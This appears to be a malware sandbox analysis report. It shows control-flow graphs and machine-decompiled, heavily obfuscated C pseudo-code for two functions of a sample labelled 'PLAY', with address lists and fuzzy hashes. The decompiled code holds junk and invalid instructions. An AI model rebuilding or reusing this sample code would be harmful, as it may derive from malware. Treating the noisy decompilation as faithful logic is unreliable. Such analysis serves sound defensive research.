          control_flow_graph 928 af3722-af372a 929 af372c-af3730 928->929 930 af3731-af3845 call aee070 928->930 929->930 933 af3847-af384f 930->933 934 af3852-af385b 930->934 935 af39fa-af3a03 934->935 936 af3861-af38a2 934->936 937 af3a0b-af3a18 call af3a44 935->937 938 af3a05 935->938 939 af38a6-af38af call aee4a0 936->939 944 af3a1a-af3a3e 937->944 945 af3a67-af3a6c 937->945 938->937 943 af38b4-af38e8 939->943 946 af38ee-af3909 GetLastError 943->946 947 af39c1-af39cc 943->947 944->945 952 af3a6e-af3a7f 945->952 953 af3ac2-af3ac5 call aee110 945->953 950 af390b-af3926 946->950 951 af3968-af396e 946->951 948 af39ce-af39dd 947->948 949 af39e1-af39f4 947->949 948->949 949->935 949->939 957 af395c-af3965 950->957 958 af3928-af3958 Sleep 950->958 954 af397e-af398f 951->954 955 af3970-af397c 951->955 959 af3a87-af3a96 call af3a92 952->959 960 af3a81 952->960 963 af3aca-af3ada 953->963 962 af3993-af39be 954->962 955->962 957->951 958->957 960->959 962->947
          C-Code - Quality: 53%
          			E00AF3722(void* __ebx, signed char __edx, void* __eflags) {
				intOrPtr _t90;
				unsigned int _t91;
				signed short* _t94;
				signed int _t96;
				signed short _t104;
				long _t107;
				signed short _t108;
				signed short _t110;
				short _t112;
				signed int _t116;
				signed short _t121;
				void* _t129;
				signed short _t134;
				signed short _t140;
				signed short _t145;
				signed short _t146;
				intOrPtr _t151;
				signed char _t152;
				signed short _t160;
				signed short _t161;
				void* _t165;
				void* _t168;
				void* _t170;
				void* _t171;
				void* _t172;

				_t152 = __edx;
				_t129 = __ebx;
				asm("in al, 0xc6");
				asm("stc");
				_push(0xff3af05);
				if(__eflags > 0) {
					asm("insb");
					_t165 = 0x1520;
				}
				 *0x100f0000 =  *0x100f0000 & _t152;
				_t90 =  *0xb09884; // 0x436939
				asm("movq [ebp-0x90], xmm0");
				asm("movq xmm0, [0xb0987c]");
				asm("movq [ebp-0x74], xmm0");
				asm("movq xmm0, [0xb09888]");
				asm("movq [ebp-0xb4], xmm0");
				asm("movq xmm0, [0xb09898]");
				asm("movq [ebp-0xc8], xmm0");
				asm("movups xmm0, [0xb098a8]");
				 *((char*)(_t168 - 0x69)) = 0;
				 *((char*)(_t168 - 0x69)) = 0;
				 *((intOrPtr*)(_t168 - 0x6c)) = _t90;
				_t91 = M00B09890; // 0x30306b46
				asm("movups [ebp-0xf0], xmm0");
				 *(_t168 - 0xac) = _t91;
				asm("movq xmm0, [0xb098b8]");
				asm("movq [ebp-0xe0], xmm0");
				asm("movq xmm0, [0xb098c0]");
				asm("psrldq xmm1, 0x4");
				asm("movd eax, xmm1");
				asm("movq [ebp-0x64], xmm0");
				asm("movups xmm0, [0xb098d0]");
				asm("movups [ebp-0xa0], xmm0");
				 *((intOrPtr*)(_t168 - 0x3c)) = 0;
				asm("movq xmm0, [0xb098e0]");
				_t94 =  *(_t129 + 8);
				asm("movq [ebp-0x90], xmm0");
				asm("movups xmm0, [0xb098ec]");
				_t160 =  *_t94;
				asm("movups [ebp-0x110], xmm0");
				asm("movq xmm0, [0xb098fc]");
				 *(_t168 - 0x40) = 0x126;
				 *(_t168 - 0x21) = 6;
				 *(_t168 - 0x22) = 0xb2;
				 *((intOrPtr*)(_t168 - 0x54)) = 0x4f52;
				asm("movq [ebp-0x100], xmm0");
				 *(_t168 - 0x4c) = _t160;
				 *(_t168 - 0x48) = _t94[2];
				_t96 = E00AEE070(_t94[2], (_t91 >> 0x10) * 0x22f3, _t160 * 4, (_t91 >> 0x10) * 0x22f3, 4); // executed
				_t171 = _t170 + 8;
				 *(_t168 - 0x38) = _t96;
				if(_t96 != 0) {
					 *(_t168 - 0x44) = 0;
					__eflags = _t160;
					if(_t160 != 0) {
						_t161 =  *(_t168 - 0x60);
						_t134 =  *(_t168 - 0x48);
						 *(_t168 - 0x68) =  *(_t168 - 0x6e) & 0x000000ff;
						 *((char*)(_t168 - 1)) =  *((intOrPtr*)(_t168 - 0x6b));
						 *((short*)(_t168 - 0x26)) =  *((intOrPtr*)(_t168 - 0xee));
						 *(_t168 - 0x20) =  *((intOrPtr*)(_t168 - 0xf0));
						 *(_t168 - 0x28) =  *((intOrPtr*)(_t168 - 0x62));
						 *((short*)(_t168 - 0x24)) =  *((intOrPtr*)(_t168 - 0x64));
						 *((short*)(_t168 - 0x30)) =  *((intOrPtr*)(_t168 - 0x108));
						do {
							_push(_t134);
							_push(E00AF3D00); // executed
							_t104 = E00AEE4A0(_t129, _t134, _t161, _t165); // executed
							_t171 = _t171 - 8 + 0x10;
							 *( *(_t168 - 0x38) +  *(_t168 - 0x44) * 4) = _t104;
							_t140 =  *(_t168 - 0x9a) - 1;
							 *(_t168 - 0x34) =  *(_t168 - 0x68) * ( *(_t168 - 0x40) & 0x0000ffff) & 0x0000ffff;
							 *(_t168 - 0x50) = _t140 & 0x0000ffff;
							 *(_t168 - 0x9a) = _t140;
							__eflags = _t104;
							if(_t104 == 0) {
								_t107 = GetLastError();
								 *((intOrPtr*)(_t168 - 0x24)) =  *((intOrPtr*)(_t168 - 0x24)) + ( *(_t168 - 0x40) & 0x0000ffff) + _t165;
								_t145 =  *(_t168 - 0x34) & 0x0000ffff;
								__eflags = _t107 - 9;
								if(_t107 == 9) {
									_t151 =  *((intOrPtr*)(_t168 - 0x3c)) + 1;
									_t165 = _t165 - ( *(_t168 - 0x50) & 0x0000ffff);
									 *((intOrPtr*)(_t168 - 0x3c)) = _t151;
									 *(_t168 - 0x20) =  *(_t168 - 0x20) + 0xffff;
									__eflags = _t151 - 0xa;
									if(_t151 > 0xa) {
										_t165 = _t165 + 1;
										 *((intOrPtr*)(_t168 - 0x3c)) = 0;
										_t161 = _t161 + ( *(_t168 - 0x21) & 0x000000ff) - 1;
										 *(_t168 - 0x60) = _t161;
										Sleep( *((intOrPtr*)(_t168 - 0x54)) + 0xffffc436);
										 *((char*)(_t168 - 1)) =  *((char*)(_t168 - 1)) + 0xfb;
										 *((short*)(_t168 - 0x26)) =  *((short*)(_t168 - 0x26)) + 5;
										_t60 = _t168 - 0x28;
										 *_t60 =  *(_t168 - 0x28) + 0xfffb;
										__eflags =  *_t60;
									}
									_t121 =  *((intOrPtr*)(_t168 - 0x108)) +  *(_t168 - 0x34);
									__eflags = _t121;
									_t145 = _t121 & 0x0000ffff;
								}
								_t108 = _t145 & 0x0000ffff;
								__eflags = _t165 - 1;
								if(_t165 != 1) {
									_t146 =  *(_t168 - 0xb0) & 0x000000ff;
									_t110 = ( *(_t168 - 0xaa) & 0x000000ff) + _t161;
									__eflags = _t110;
									 *(_t168 - 0x20) = _t110;
								} else {
									_t146 = _t108;
									_t165 = ( *(_t168 - 0x9e) & 0x0000ffff) + 2;
								}
								_t112 = ( *(_t168 - 0x22) & 0x000000ff) - 1;
								 *((short*)(_t168 - 0x30)) = _t112;
								 *((short*)(_t168 - 0x108)) = _t112;
								_t116 = _t165 + 1 + (_t146 & 0x0000ffff) - ( *(_t168 - 0xea) & 0x0000ffff) - ( *(_t168 - 0x96) & 0x0000ffff);
								__eflags = _t116;
								 *(_t168 - 0x40) = _t116;
							}
							__eflags =  *((intOrPtr*)(_t168 - 0xec)) -  *((intOrPtr*)(_t168 - 0x30));
							if( *((intOrPtr*)(_t168 - 0xec)) <  *((intOrPtr*)(_t168 - 0x30))) {
								 *(_t168 - 0x20) =  *(_t168 - 0x20) + 1;
								_t161 = _t165 -  *(_t168 - 0x60) -  *((intOrPtr*)(_t168 - 0xe8));
								__eflags = _t161;
								 *(_t168 - 0x60) = _t161;
							}
							_t96 =  *(_t168 - 0x44) + 1;
							_t134 =  *(_t168 - 0x48) + 0xc;
							 *(_t168 - 0x44) = _t96;
							 *(_t168 - 0x48) = _t134;
							__eflags = _t96 -  *(_t168 - 0x4c);
						} while (_t96 <  *(_t168 - 0x4c));
					}
					_t172 = _t171 - 8;
					__eflags = 0x2d - 0x52;
					if(0x2d == 0x52) {
						_t172 = _t172 + 0x139;
					}
					L21();
					asm("adc eax, 0x49272a6e");
					asm("jecxz 0x4f");
					asm("out 0xe6, eax");
					asm("fimul dword [eax+0x2]");
					asm("in eax, dx");
					 *0xaf511e3e =  *0xaf511e3e << 0x9e;
					asm("adc ecx, [edi]");
					asm("in al, dx");
					 *0x0000006A = _t96;
					_push(0xfffffff1);
					asm("invalid");
					asm("sbb [ecx-0x271d18ee], esp");
					 *0x2d =  *0x2d - 1;
					asm("invalid");
					asm("jecxz 0xffffff85");
					 *0xb0ebec4f =  *0xb0ebec4f + 0x36;
					__eflags =  *0xb0ebec4f;
					return _t96;
				} else {
					return _t96;
				}
			}




























          0x00af3722
          0x00af3722
          0x00af3722
          0x00af3724
          0x00af3725
          0x00af372a
          0x00af372c
          0x00af3730
          0x00af3730
          0x00af3731
          0x00af373c
          0x00af3741
          0x00af3749
          0x00af3751
          0x00af3756
          0x00af375e
          0x00af3766
          0x00af376e
          0x00af3776
          0x00af377d
          0x00af3781
          0x00af3785
          0x00af3788
          0x00af378d
          0x00af3794
          0x00af379a
          0x00af37a2
          0x00af37aa
          0x00af37b2
          0x00af37b7
          0x00af37bb
          0x00af37c0
          0x00af37d2
          0x00af37d9
          0x00af37dc
          0x00af37e4
          0x00af37e7
          0x00af37ef
          0x00af37f8
          0x00af37fd
          0x00af3805
          0x00af3814
          0x00af381b
          0x00af381f
          0x00af3823
          0x00af382a
          0x00af3832
          0x00af3835
          0x00af3838
          0x00af383d
          0x00af3840
          0x00af3845
          0x00af3852
          0x00af3859
          0x00af385b
          0x00af3865
          0x00af3869
          0x00af386c
          0x00af3872
          0x00af387c
          0x00af3887
          0x00af388f
          0x00af3897
          0x00af38a2
          0x00af38a6
          0x00af38a9
          0x00af38aa
          0x00af38af
          0x00af38b7
          0x00af38bd
          0x00af38d5
          0x00af38d6
          0x00af38dc
          0x00af38df
          0x00af38e6
          0x00af38e8
          0x00af38ee
          0x00af38fc
          0x00af3903
          0x00af3906
          0x00af3909
          0x00af3914
          0x00af3915
          0x00af3917
          0x00af391f
          0x00af3923
          0x00af3926
          0x00af392a
          0x00af392b
          0x00af3934
          0x00af393f
          0x00af3944
          0x00af394a
          0x00af3953
          0x00af3958
          0x00af3958
          0x00af3958
          0x00af3958
          0x00af3962
          0x00af3962
          0x00af3965
          0x00af3965
          0x00af3968
          0x00af396b
          0x00af396e
          0x00af3985
          0x00af398c
          0x00af398c
          0x00af398f
          0x00af3970
          0x00af3977
          0x00af3979
          0x00af3979
          0x00af3997
          0x00af399c
          0x00af39a0
          0x00af39bc
          0x00af39bc
          0x00af39be
          0x00af39be
          0x00af39c8
          0x00af39cc
          0x00af39ce
          0x00af39d7
          0x00af39d7
          0x00af39dd
          0x00af39dd
          0x00af39e7
          0x00af39e8
          0x00af39eb
          0x00af39ee
          0x00af39f1
          0x00af39f1
          0x00af38a6
          0x00af39fa
          0x00af3a01
          0x00af3a03
          0x00af3a05
          0x00af3a05
          0x00af3a0e
          0x00af3a13
          0x00af3a18
          0x00af3a1a
          0x00af3a1c
          0x00af3a1f
          0x00af3a20
          0x00af3a27
          0x00af3a29
          0x00af3a2a
          0x00af3a2d
          0x00af3a2f
          0x00af3a38
          0x00af3a3e
          0x00af3a40
          0x00af3a43
          0x00af3a44
          0x00af3a44
          0x00af3a48
          0x00af3847
          0x00af384f
          0x00af384f

          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: ErrorLastSleep
          • String ID: 9iC$Fk00NL$RO
          • API String ID: 1458359878-3636773697
          • Opcode ID: 6a9bfe13dba50d9f559459b6afba70e35ec34c7b422d5037c2b64e81728f7f42
          • Instruction ID: 345676be7c6ef9cf2e249a4822dc0e1e2a40671d771a0110b2975d93796fc8f5
          • Opcode Fuzzy Hash: 6a9bfe13dba50d9f559459b6afba70e35ec34c7b422d5037c2b64e81728f7f42
          • Instruction Fuzzy Hash: B0A1C076D043A98BCF10DFA8D8512ECBBB0FF69310F04829AE889B7351E7755A81CB54
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AF26E9 Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 468COMMON
          Download Yara Rule

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 966 af26e9-af2866 call aef270 969 af287c-af288d 966->969 970 af2868-af287b call af7b30 966->970 971 af288f-af28ae 969->971 972 af28fc-af2902 969->972 975 af28b4-af28b7 971->975 976 af2908-af2951 972->976 977 af28b9-af28dd 975->977 978 af28e3-af28ec 975->978 979 af2f3f-af2f66 976->979 980 af2957-af295d 976->980 977->978 978->975 981 af28ee-af28fa 978->981 982 af2f6c-af2f7f 979->982 983 af2f05-af2f3d 980->983 984 af2963-af2a4f 980->984 981->976 985 af2fa6-af2fa8 982->985 986 af2f81-af2f87 982->986 983->982 988 af2a50-af2a69 984->988 990 af2fae-af2fd8 985->990 991 af3152-af315a 985->991 989 af2f90-af2fa4 986->989 994 af2a6f-af2a9b call aee4a0 988->994 995 af2c33-af2c3a 988->995 989->985 989->989 996 af2fe0-af2fef 990->996 992 af315c 991->992 993 af3162-af3181 call af31a2 991->993 992->993 1006 af3123-af3150 call aedec0 993->1006 1007 af3183-af318c 993->1007 1008 af2b6a-af2b79 994->1008 1009 af2aa1-af2aa7 994->1009 997 af2c3c-af2c69 995->997 998 af2c70-af2cce 995->998 1001 af2ff1-af2ffa call aee4a0 996->1001 1002 af3060-af3063 996->1002 997->998 998->988 1010 af2fff-af3040 1001->1010 1002->996 1006->991 1033 af30f0-af3106 1006->1033 1013 af2b7b-af2b97 1008->1013 1014 af2b99 1008->1014 1011 af2aa9-af2b0e 1009->1011 1012 af2b10-af2b5e call b03060 1009->1012 1016 af3068-af3077 1010->1016 1017 af3042-af305a 1010->1017 1022 af2b64 1011->1022 1012->1022 1021 af2b9f-af2be1 1013->1021 1014->1021 1018 af307f-af30b2 call af30b8 1016->1018 1019 af3079 1016->1019 1017->1002 1018->1033 1019->1018 1026 af2be7-af2c2c 1021->1026 1027 af2cd3-af2d49 1021->1027 1022->1008 1026->995 1030 af2d4b 1027->1030 1031 af2d51-af2d5e call af2d8a 1027->1031 1030->1031 1038 af2dad 1031->1038 1039 af2d60-af2d84 1031->1039 1036 af310e-af311d call af3119 1033->1036 1037 af3108 1033->1037 1037->1036 1038->983 1039->1038
          C-Code - Quality: 43%
          			E00AF26E9(void* __eax, void* __edi, void* __eflags) {
				intOrPtr _t258;
				char _t260;
				void* _t261;
				signed int* _t263;
				signed int _t266;
				intOrPtr _t272;
				signed int _t273;
				signed int _t276;
				void* _t282;
				intOrPtr _t283;
				signed int _t285;
				signed int _t298;
				signed int _t299;
				signed int _t302;
				void* _t305;
				signed int _t310;
				short _t312;
				signed int _t315;
				signed int _t316;
				signed short _t317;
				signed short _t319;
				signed short _t320;
				signed short _t325;
				signed int _t334;
				short _t337;
				short _t343;
				signed int _t345;
				signed short _t348;
				signed int _t349;
				signed int _t356;
				signed char _t357;
				signed int _t358;
				signed int _t359;
				intOrPtr _t361;
				signed int _t365;
				signed int _t369;
				signed char _t374;
				signed char _t375;
				short _t380;
				short _t382;
				void* _t392;
				signed int _t393;
				signed int _t394;
				signed short _t402;
				signed int _t403;
				signed int _t405;
				signed int _t406;
				signed short _t409;
				signed int _t412;
				signed int _t414;
				signed int _t416;
				signed short _t418;
				signed int _t419;
				short _t420;
				signed int _t422;
				signed short _t423;
				signed int _t429;
				signed int* _t431;
				void* _t432;
				void* _t433;
				void* _t436;
				void* _t440;

				 *((intOrPtr*)(_t429 + 0x100f7b53)) =  *((intOrPtr*)(_t429 + 0x100f7b53)) - __edi;
				_t258 =  *"614hJ"; // 0x68343136
				_t392 = _t429 - 0x298;
				 *((intOrPtr*)(_t429 - 0x300)) = _t258;
				asm("movups [ebp-0x3ac], xmm0");
				_t348 = 0x1b94;
				asm("movq xmm0, [0xb09748]");
				_t412 = 0x1fce;
				asm("movq [ebp-0x39c], xmm0");
				_t422 = 0x772;
				asm("movups xmm0, [0xb09750]");
				 *(_t429 - 0x2ec) =  *0xb097bc & 0x0000ffff;
				_t260 =  *0xb097be; // 0x0
				asm("movups [ebp-0x358], xmm0");
				 *(_t429 - 0x33c) = 0xea;
				asm("movq xmm0, [0xb09760]");
				asm("movq [ebp-0x348], xmm0");
				asm("cld");
				asm("invalid");
				asm("movups xmm0, [0xb09768]");
				 *(_t429 - 0x2b2) = 0xe8;
				 *((char*)(_t429 - 0x2a9)) = 0xeb;
				asm("movups [ebp-0x338], xmm0");
				 *((char*)(_t429 - 0x2b3)) = 0xd4;
				asm("movq xmm0, [0xb09778]");
				asm("movq [ebp-0x328], xmm0");
				asm("movups xmm0, [0xb09784]");
				 *((char*)(_t429 - 0x2f8)) = 0;
				 *((char*)(_t429 - 0x29a)) = 0x4f;
				asm("movups [ebp-0x384], xmm0");
				 *(_t429 - 0x2a8) = 0x87;
				asm("movq xmm0, [0xb09794]");
				asm("movq [ebp-0x374], xmm0");
				asm("movq xmm0, [0xb097a4]");
				asm("movq [ebp-0x31c], xmm0");
				asm("movq xmm0, [0xb097c0]");
				asm("movq [ebp-0x390], xmm0");
				asm("movups xmm0, [0xb097cc]");
				 *((char*)(_t429 - 0x2aa)) = 0xe6;
				 *(_t429 - 0x2a7) = 0x85;
				asm("movups [ebp-0x3c8], xmm0");
				 *(_t429 - 0x2a6) = 0xd2;
				asm("movq xmm0, [0xb097dc]");
				 *((char*)(_t429 - 0x29b)) = 0x2c;
				 *((char*)(_t429 - 0x2e8)) = 0;
				 *(_t429 - 0x2b0) = 0;
				 *(_t429 - 0x2a4) = 0x1b94;
				 *(_t429 - 0x2f4) = 0x1fce;
				 *(_t429 - 0x2c8) = 0;
				 *((char*)(_t429 - 0x2ea)) = _t260;
				 *(_t429 - 0x2b4) = 0xd8;
				 *((char*)(_t429 - 0x2e7)) = 0;
				asm("movq [ebp-0x3b8], xmm0"); // executed
				_t261 = E00AEF270(0x2c, _t392); // executed
				if(_t261 == 0) {
					_t393 = 0;
					_t263 =  *(_t429 - 0x310);
					_t356 =  *_t263;
					__eflags = _t356;
					if(_t356 == 0) {
						_t357 =  *((intOrPtr*)(_t429 - 0x300));
						 *(_t429 - 0x299) = _t357;
					} else {
						 *(_t429 - 0x2a4) = 0x1b94 + _t356 * 4;
						_t345 = _t263[3] + 4;
						__eflags = _t345;
						 *(_t429 - 0x299) =  *((intOrPtr*)(_t429 - 0x300));
						_t348 =  *(_t429 - 0x2a4);
						do {
							__eflags =  *_t345;
							if( *_t345 != 0) {
								 *(_t429 - 0x299) =  *(_t429 - 0x299) + 4;
								 *(_t429 - 0x352) =  *(_t429 - 0x352) + 0xfffc;
								_t393 = _t393 + 1;
								_t348 =  *(_t429 - 0x2a4);
								_t412 = _t412 + 4;
								asm("adc dword [ebp-0x2c8], 0x0");
								_t422 = _t422 + 0x74e4;
								__eflags = _t422;
							}
							_t345 = _t345 + 0xc;
							_t422 = _t422 + _t412 * 4;
							_t356 = _t356 - 1;
							__eflags = _t356;
						} while (_t356 != 0);
						_t357 =  *(_t429 - 0x299);
						 *(_t429 - 0x2f4) = _t412;
					}
					 *(_t429 - 0x394) = 2;
					_t266 = _t393 >> 6;
					_t394 = _t393 & 0x0000003f;
					_t414 = 0;
					 *(_t429 - 0x2c0) = _t266;
					__eflags = _t266;
					 *(_t429 - 0x308) = _t394;
					 *(_t429 - 0x2cc) = 0;
					 *(_t429 - 0x2d8) = 0xfffb;
					 *((short*)(_t429 - 0x2da)) =  *(_t429 - 0x336);
					if(_t266 == 0) {
						_t358 =  *((intOrPtr*)(_t429 - 0x2fd));
						 *(_t429 - 0x2d0) =  *(_t429 - 0x3a6);
						 *(_t429 - 0x2c4) =  *(_t429 - 0x332);
						 *(_t429 - 0x2bc) =  *(_t429 - 0x31c);
						goto L34;
					} else {
						__eflags =  *(_t429 - 0x2c0);
						if( *(_t429 - 0x2c0) <= 0) {
							 *(_t429 - 0x2d0) =  *(_t429 - 0x3a6);
							 *(_t429 - 0x2c4) =  *(_t429 - 0x332);
							 *(_t429 - 0x2bc) =  *(_t429 - 0x31c);
							_t358 = ( *(_t429 - 0x336) & 0x000000ff) * ( *(_t429 - 0x2fe) & 0x000000ff);
							L34:
							 *(_t429 - 0x2c0) = _t358;
							_t359 =  *(_t429 - 0x2b4) & 0x000000ff;
							__eflags = _t359 - 0xd6;
							if(_t359 > 0xd6) {
								_t365 = _t359 + 0xffffff2a;
								asm("o16 nop [eax+eax]");
								do {
									 *(_t429 - 0x394) =  *(_t429 - 0x394) * 0x213c;
									_t365 = _t365 - 1;
									__eflags = _t365;
								} while (_t365 != 0);
							}
							__eflags = _t394;
							if(_t394 == 0) {
								while(1) {
									L53:
									_t432 = _t431 - 0xc;
									__eflags = 0x57 - 0x2c;
									if(0x57 <= 0x2c) {
										_t432 = _t432 + 0x166;
									}
									_t431 = _t432 + 0xc;
									L61();
									while(1) {
										_t272 =  *0xa5de12ed;
										asm("sbb edi, [eax-0x32e0790b]");
										asm("sbb ah, [edi]");
										if(__eflags < 0) {
											break;
										} else {
											goto L57;
										}
										asm("out 0xf6, eax");
									}
									asm("pushfd");
									asm("daa");
									asm("enter 0x1d82, 0x54");
									asm("aas");
									_t361 =  *0xb0d648; // 0xcafce4e7
									_t273 = E00AEDEC0(_t348, _t361, _t414, _t422);
									while(1) {
										asm("invalid");
										 *_t273( *(_t429 - 0x2ec));
										_t276 =  *(_t429 - 0x2d8) + 1;
										 *(_t429 - 0x2d8) = _t276;
										__eflags = _t276 -  *(_t429 - 0x308);
										if(_t276 >=  *(_t429 - 0x308)) {
											goto L53;
										}
										_t273 =  *(_t429 + _t276 * 4 - 0x108);
										 *(_t429 - 0x2ec) = _t273;
										_t433 = _t431 - 0x10;
										__eflags = 0x79 - 0x24;
										if(0x79 <= 0x24) {
											_t433 = _t433 + 0x184;
										}
										_t431 = _t433 + 0x10;
										L50();
										_t414 = _t414 - 1;
										__eflags = _t414;
										if(_t414 < 0) {
											continue;
										} else {
											 *_t431 =  *_t431 + 0x14;
											__eflags =  *_t431;
											return _t273;
										}
										goto L62;
									}
								}
							} else {
								_t423 =  *(_t429 - 0x2a4);
								_t349 = 0;
								 *((short*)(_t429 - 0x2a0)) =  *((intOrPtr*)(_t429 - 0x350));
								_t416 = _t414 + _t414 * 2 << 2;
								__eflags = _t416;
								 *(_t429 - 0x29e) =  *((intOrPtr*)(_t429 - 0x334));
								while(1) {
									_t282 = ( *(_t429 - 0x310))[3] + _t416;
									__eflags =  *(_t282 + 4);
									if( *(_t282 + 4) == 0) {
										goto L42;
									}
									_push(_t282);
									_push( &M00AF3AE0); // executed
									_t283 = E00AEE4A0(_t349, _t359, _t416, _t423); // executed
									 *((short*)(_t429 - 0x2da)) =  *((short*)(_t429 - 0x2da)) + 3;
									_t431 = _t431 - 8 + 0x10;
									 *(_t429 - 0x29e) =  *(_t429 - 0x29e) + 5;
									 *((intOrPtr*)(_t429 + _t349 * 4 - 0x108)) = _t283;
									 *(_t429 - 0x2d0) =  *(_t429 - 0x2d0) + 0xfffd;
									_t349 = _t349 + 1;
									_t285 =  *(_t429 - 0x2d8);
									 *((intOrPtr*)(_t429 - 0x2a0)) =  *((intOrPtr*)(_t429 - 0x2a0)) + _t285;
									 *(_t429 - 0x2c4) =  *(_t429 - 0x2c4) + _t285;
									__eflags = _t349 -  *(_t429 - 0x308);
									if(_t349 !=  *(_t429 - 0x308)) {
										 *((char*)(_t429 - 0x29a)) =  *((char*)(_t429 - 0x29a)) + 1;
										 *(_t429 - 0x2bc) =  *(_t429 - 0x2bc) + 0x1262;
										_t423 = _t423 + 0x47ae;
										_t242 = _t429 - 0x2c0;
										 *_t242 =  *(_t429 - 0x2c0) - 1;
										__eflags =  *_t242;
										goto L42;
									}
									 *(_t429 - 0x2ec) = _t349;
									_t436 = _t431 - 8;
									__eflags = 0x2d - 0x52;
									if(0x2d == 0x52) {
										_t436 = _t436 + 0x139;
									}
									L46();
									asm("adc eax, 0x49272a6e");
									asm("jecxz 0x4f");
									asm("out 0xe6, eax");
									asm("fimul dword [eax+0x2]");
									asm("in eax, dx");
									 *0xaf511e3e =  *0xaf511e3e << 0x9e;
									asm("adc ecx, [edi]");
									asm("in al, dx");
									 *0x0000006A = _t285;
									_push(0xfffffff1);
									asm("invalid");
									asm("sbb [ecx-0x271d18ee], esp");
									 *0x2d =  *0x2d - 1;
									asm("invalid");
									asm("jecxz 0xffffff85");
									 *0xb0ebec4f =  *0xb0ebec4f + 0x36;
									__eflags =  *0xb0ebec4f;
									return _t285;
									goto L62;
									L42:
									_t416 = _t416 + 0xc;
								}
							}
						} else {
							 *((char*)(_t429 - 0x2b1)) =  *(_t429 - 0x2a7) +  *((intOrPtr*)(_t429 - 0x2a9));
							 *(_t429 - 0x35c) = _t357 & 0x000000ff;
							 *(_t429 - 0x360) =  *(_t429 - 0x354) & 0x0000ffff;
							 *((intOrPtr*)(_t429 - 0x30c)) =  *((intOrPtr*)(_t429 - 0x330));
							 *((intOrPtr*)(_t429 - 0x340)) =  *((intOrPtr*)(_t429 - 0x382));
							 *(_t429 - 0x2d0) =  *(_t429 - 0x3a6);
							 *((short*)(_t429 - 0x2ac)) =  *((intOrPtr*)(_t429 - 0x338));
							_t369 =  *((intOrPtr*)(_t429 - 0x378));
							 *(_t429 - 0x29e) =  *(_t429 - 0x31a);
							 *((short*)(_t429 - 0x2a0)) =  *((intOrPtr*)(_t429 - 0x356));
							_t418 =  *(_t429 - 0x31c);
							 *(_t429 - 0x304) =  *(_t429 - 0x32e);
							_t298 =  *(_t429 - 0x332);
							 *((intOrPtr*)(_t429 - 0x2b8)) = _t369;
							 *(_t429 - 0x2a5) =  *((intOrPtr*)(_t429 - 0x2fd));
							_t299 = _t298 + 1;
							 *(_t429 - 0x2c4) = _t299;
							 *(_t429 - 0x332) = _t299;
							 *(_t429 - 0x2ec) =  *(_t429 - 0x2c8);
							 *(_t429 - 0x2a4) = 0;
							_t302 =  *(_t429 - 0x2cc) +  *(_t429 - 0x2cc) * 2 << 2;
							__eflags = _t302;
							 *(_t429 - 0x2d4) = _t302;
							while(1) {
								_t402 =  *(_t429 - 0x2b0);
								_t305 = ( *(_t429 - 0x310))[3] +  *(_t429 - 0x2d4);
								__eflags =  *(_t305 + 4);
								if( *(_t305 + 4) == 0) {
									goto L25;
								}
								_push(_t305);
								_push( &M00AF3AE0);
								_t316 = E00AEE4A0(_t348, _t369, _t418, _t422);
								_t403 =  *(_t429 - 0x2a4);
								_t431 = _t431 - 8 + 0x10;
								 *((char*)(_t429 - 0x29a)) =  *((intOrPtr*)(_t429 - 0x2b1));
								 *(_t429 + _t403 * 4 - 0x108) = _t316;
								__eflags = _t316;
								if(_t316 == 0) {
									__eflags = _t422 - 0x6e3c;
									if(_t422 <= 0x6e3c) {
										asm("cdq");
										 *(_t429 - 0x3a8) = _t348;
										 *(_t429 - 0x352) = E00B03060( *(_t429 - 0x2f4),  *(_t429 - 0x2c8),  *(_t429 - 0x352) & 0x0000ffff, _t403);
										_t422 = ( *(_t429 - 0x304) & 0x0000ffff) + (_t418 & 0x0000ffff) + ( *(_t429 - 0x33c) & 0x000000ff);
										_t334 =  *(_t429 - 0x2ff) -  *((intOrPtr*)(_t429 - 0x380));
										__eflags = _t334;
										 *(_t429 - 0x2a6) = _t334;
									} else {
										_t409 =  *(_t429 - 0x31c);
										_t337 =  *(_t429 - 0x354) -  *((intOrPtr*)(_t429 - 0x384)) + _t409;
										 *((intOrPtr*)(_t429 - 0x30c)) = _t337;
										_t422 = ( *(_t429 - 0x29e) & 0x0000ffff) + _t348;
										 *((short*)(_t429 - 0x330)) = _t337;
										 *(_t429 - 0x304) =  *((intOrPtr*)(_t429 - 0x338)) +  *((intOrPtr*)(_t429 - 0x334)) + _t409 + 1;
										_t348 = (_t418 & 0x0000ffff) * ( *(_t429 - 0x2ff) & 0x000000ff);
										_t343 =  *((intOrPtr*)(_t429 - 0x2a0)) + 1;
										 *((short*)(_t429 - 0x2a0)) = _t343;
										 *((short*)(_t429 - 0x356)) = _t343;
									}
									_t403 =  *(_t429 - 0x2a4);
								}
								_t317 =  *(_t429 - 0x2f4);
								_t419 = _t317 & 0x0000ffff;
								__eflags = _t348 -  *(_t429 - 0x35c);
								if(_t348 >=  *(_t429 - 0x35c)) {
									_t374 =  *(_t429 - 0x2a5);
								} else {
									_t374 =  *(_t429 - 0x2fe) + _t317;
									 *((intOrPtr*)(_t429 - 0x2b8)) =  *((intOrPtr*)(_t429 - 0x358)) -  *(_t429 - 0x332) + _t419;
								}
								_t375 = _t374 - 1;
								 *(_t429 - 0x2a4) = _t403 + 1;
								_t405 = _t348 & 0x0000ffff;
								 *(_t429 - 0x2a5) = _t375;
								_t319 = _t405 + _t405 - (_t375 & 0x000000ff);
								__eflags =  *(_t429 - 0x2a4) - 0x40;
								 *(_t429 - 0x2bc) = _t319;
								 *(_t429 - 0x31c) = _t319;
								 *(_t429 - 0x2b0) = ( *(_t429 - 0x29e) & 0x0000ffff) +  *(_t429 - 0x360);
								if( *(_t429 - 0x2a4) != 0x40) {
